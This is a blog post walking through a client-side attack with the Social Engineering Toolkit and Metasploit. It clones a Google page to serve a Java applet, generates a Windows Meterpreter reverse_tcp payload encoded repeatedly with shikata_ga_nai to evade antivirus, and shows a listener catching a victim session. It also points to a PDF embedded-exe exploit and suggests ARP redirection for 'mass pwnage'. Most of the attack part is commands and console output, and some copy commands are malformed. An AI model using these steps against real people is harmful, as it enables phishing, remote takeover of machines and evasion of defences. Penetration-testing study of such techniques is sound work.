Client Side exploits


Hackers For Charity

Client side attacks nowadys have become a major focus when performing penetration tests. You are sure once you forward an infected word document or attach malicious exe`s on a pdf, someone in the organisation will open the document. It has become practically impossible to defend against such attacks .

A while back Valsmith,Colim ames, and David kerb released a great way to perform such client attacks during the Blackhat and Defcon conferences with the Metaphish paper and code.
http://attackresearch.com/pub.html
This brought a whole new aspect of using signed java applets to attack clients and attaching metasploit payloads to pdf documents.

Since then David Kennedy with the Social Enginnering Framework and produced a marvelous automated tool called SET. SET allows you to perform all the above attacks and even more , one feature i love is the “website cloning feature”, incorporate that with an arp redirect attack with ettercap, and you could pwn all the clients during a pentest. (with permission of course)Imagine cloning a site as common as “Google” or Facebook and then perfoming a java applet attack 🙂 , total mass pwnage. On backtrack4 final, set is on the path /pentest/exploits/SET/set

Usage: Commands are in bold

I first downloaded google.com and moved it to /var/www/google/. a simple wget http://www.google.co.ke will do.
cp -r http://www.google.co.ke/ /var/www/
cd /var/www/
mv http://www.google.co.ke /var/www/google

cd /pentest/exploits/SET/
./set

Select from the menu on what you would like to do:

1. Automatic E-Mail Attacks (UPDATED)
2. Website Java Applet Attack (UPDATED)
3. Update Metasploit
4. Update SET
5. Create a Payload and Listener
6. Help
7. Exit the Toolkit

Enter your choice: 2
Website Attack Vectors

1. Let SET create a website for you
2. Clone and setup a fake website (NEW)
3. Import your own website (NEW)
4. Return to main menu.

Enter number: 3
Enter your current IP Address: 192.168.20.1

Enter the path to the website to be cloned: /var/www/google/
What payload do you want to generate:

Name: Description:

1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
8. Import your own executable Specify a path for your own executable

Enter choice (example 1-4): 2

Below is a list of encodings to try and bypass AV.

Select one of the below, Shikata_Ga_Nai is typically the best.

1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding

Enter your choice (enter for default): 2

Usually 1 to 4 does the trick, if you get an error messsage, some encoders don’t like more than one. Specify 0 if you want.

How many times do you want to encode the payload: 4

Enter the PORT of the listener: 4444

[-] Encoding the payload 4 times to get around pesky Anti-Virus. [-]

[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
…………………………..
………………………..
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.20.1
LHOST => 192.168.20.1
resource (src/program_junk/meta_config)> set LPORT 4444
LPORT => 4444
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.20.1:4444
[*] Starting the payload handler…

msf exploit(handler) >

The client goes to the fatefull page http://192.168.20.1 and gets the google search page and runs the java applet. You need to have java installed on client side.

msf exploit(handler) > [*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.20.1:4444 -> 192.168.20.4:1123)

msf exploit(handler) > sessions

Active sessions
===============

Id Description Tunnel
— ———– ——
1 Meterpreter 192.168.20.1:4444 -> 192.168.20.4:1123

Review a video here on the use of SET :
http://vimeo.com/groups/33570/videos/8450443

SET will introduce a version 0.4 soon, with this, you can even sign the java applets yourself.
Review a video here on the new version of SET :
http://vimeo.com/9198233
Metasploit on the other hand loaded to trunk a java_applet module, with an excellent rank. I have tested it against firefox, ie. It works wonders.

For the metasploit module, there is a good tutorial to follow through at paul dot com. The link is http://pauldotcom.com/wiki/index.php/Episode185 The tutorial is easy to understand and follow.

Try out the clone feature on SET that downloads the url you give it and embeds the java applet on it.

As for pdf attacks, the procedure is the same , try out the adobe attacks and especially the ” Adobe PDF Embedded EXE Social Engineering” on SET and on metasploit it’s the exploit windows/fileformat/adobe_pdf_embedded_exe.

References:
http://www.attackresearch.com
http://www.social-engineer.org
http://pauldotcom.com
http://metasploit.com
Credits: David Kennedy, Valsmith, hdm and the metasploit crew, Carlos perez, pauldotcom crew,muts

Happy client side hacking

Advertisements
This entry was posted in Uncategorized. Bookmark the permalink.

2 Responses to Client Side exploits

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s